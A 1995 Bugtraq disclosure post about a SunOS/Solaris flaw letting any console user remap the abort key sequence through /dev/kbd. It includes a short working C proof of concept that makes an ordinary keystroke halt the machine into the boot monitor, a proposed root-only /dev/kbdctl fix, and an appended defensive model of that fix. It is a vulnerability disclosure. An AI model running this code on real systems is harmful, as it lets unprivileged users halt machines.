[2438] in bugtraq
little whole on Suns concerning /dev/kbd
daemon@ATHENA.MIT.EDU (Arfst Ludwig)
Thu Dec 7 19:20:49 1995
Date: Sat, 2 Dec 1995 23:56:03 +0100
Reply-To: Bugtraq List <BUGTRAQ@crimelab.com>
From: Arfst Ludwig <Arfst.Ludwig@luxor.in-berlin.de>
X-To: BUGTRAQ@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@crimelab.com>
Hi!
On a SUN with SunOS 4.1.* or Solaris 2.* any user logged on the console can
remap the abort key sequence (the key sequence to enter the boot monitor).
Impact: Any arbitrary key sequence can enter the boot monitor and halt
the machine.
The abort key sequence can easily be remapped, e.g. to shift_l a. Instead of
getting an `A' the user gets the boot monitor prompt:
8<--------------------------- cut here ----------------------------
#include <stdio.h>
#include <fcntl.h>
#include <sundev/kbd.h>
#include <sundev/kbio.h>

int main()
{
    int fd;
    struct kiockey k;

    fd = open("/dev/kbd", O_RDWR);
    if (fd < 0) {
        perror("/dev/kbd");
        return (1);
    }

    /* first key of the abort sequence */
    k.kio_tablemask = KIOCABORT1;
    k.kio_station = 0x6e;
    ioctl(fd, KIOCSETKEY, &k);

    /* second key of the abort sequence */
    k.kio_tablemask = KIOCABORT2;
    k.kio_station = 0x4d;
    ioctl(fd, KIOCSETKEY, &k);

    close(fd);
    return (0);
}
8<--------------------------- cut here ----------------------------
Is there a fix possible? /dev/kbd should be readable to the user logged
at the console. Redefining the abort sequence should only be allowed
via a new device e.g. /dev/kbdctl which is accessible only by root.
Cheers, Arfst
______________________________________________________________________
__
(00) Arfst Ludwig
\`\/ E-Mail: Arfst.Ludwig@luxor.in-berlin.de
"" carpe diem
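
Added example, not part of the original post and not SunOS driver code: a user-space model of the split the post proposes, where abort-table changes are refused on /dev/kbd and accepted only on a root-only /dev/kbdctl. The minor numbers, table selectors, struct names and the initial station values are constructed stand-ins; only 0x6e and 0x4d come from the post.

```c
/* User-space model of the proposed split; not SunOS driver code. */
#include <errno.h>
#include <stdio.h>

/* Constructed stand-ins: hypothetical minors for /dev/kbd and /dev/kbdctl,
 * and table selectors that only play the role of KIOCABORT1/KIOCABORT2. */
enum { M_KBD = 0, M_KBDCTL = 1 };
enum { T_NORMAL = 0, T_ABORT1 = 1, T_ABORT2 = 2, T_COUNT = 3 };

struct keyreq { int table; int station; };   /* stand-in for struct kiockey */
struct kbd_state { int station[T_COUNT]; };  /* one key station per table */

/* Gate for a set-key request. Abort tables can be changed only through the
 * control node, and only by uid 0 (a second check behind the node's file
 * mode). Returns 0 on success or a negative errno, leaving state untouched. */
int kbd_setkey(struct kbd_state *st, int minor, int uid, const struct keyreq *rq)
{
    int is_abort;

    if (rq->table < 0 || rq->table >= T_COUNT)
        return -EINVAL;
    is_abort = (rq->table == T_ABORT1 || rq->table == T_ABORT2);
    if (is_abort && minor != M_KBDCTL)
        return -ENOTTY;   /* request is not offered on the data node */
    if (is_abort && uid != 0)
        return -EPERM;
    st->station[rq->table] = rq->station;
    return 0;
}

int main(void)
{
    struct kbd_state st = { { 0x00, 0x01, 0x4d } };  /* constructed initial state */
    struct keyreq rq = { T_ABORT1, 0x6e };           /* station value from the post */

    printf("console user via kbd:    %d\n", kbd_setkey(&st, M_KBD, 1000, &rq));
    printf("console user via kbdctl: %d\n", kbd_setkey(&st, M_KBDCTL, 1000, &rq));
    printf("root via kbdctl:         %d\n", kbd_setkey(&st, M_KBDCTL, 0, &rq));
    printf("abort1 station now 0x%02x\n", st.station[T_ABORT1]);
    return 0;
}
```

Ordinary key remaps through the data node still succeed for the console user in this model; only the two abort tables are gated.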